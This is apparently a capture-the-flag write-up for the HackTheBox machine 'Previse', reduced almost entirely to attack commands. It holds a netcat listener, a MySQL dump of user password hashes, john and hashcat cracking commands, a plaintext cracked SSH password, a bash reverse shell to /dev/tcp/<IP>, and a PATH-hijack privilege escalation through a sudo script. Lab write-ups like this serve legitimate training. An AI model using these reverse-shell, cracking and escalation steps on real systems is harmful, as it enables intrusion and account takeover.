Previse-HTB-Writeup

/css
/js
/nav.php
python3 -m http.server 9191
nc -lvnp <port>
show tables;
#this command will display the tables in our database
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM accounts;                                                                                      
SELECT * FROM accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | far1s | $1$🧂llol$J.VmdoVZ4IjW4C57oRv1m0 | 2021-08-05 13:10:08 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)
#cracking using john the ripper:
john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt m4lwherepasswd.txt
#cracking using hashcathashcat -a 0 -m 500 m4lwherepasswd.txt /usr/share/wordlists/rockyou.txt
ssh m4lwhere@previse.htb password: ilovecody112235!
#!/bin/bash
/bin/sh -i >& /dev/tcp/<IP>/2424 0>&1
export PATH=$(pwd):.:$PATH
attacking machine : nc -lvnp <PORt>
ssh shell : sudo /opt/scripts/access_backup.sh

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store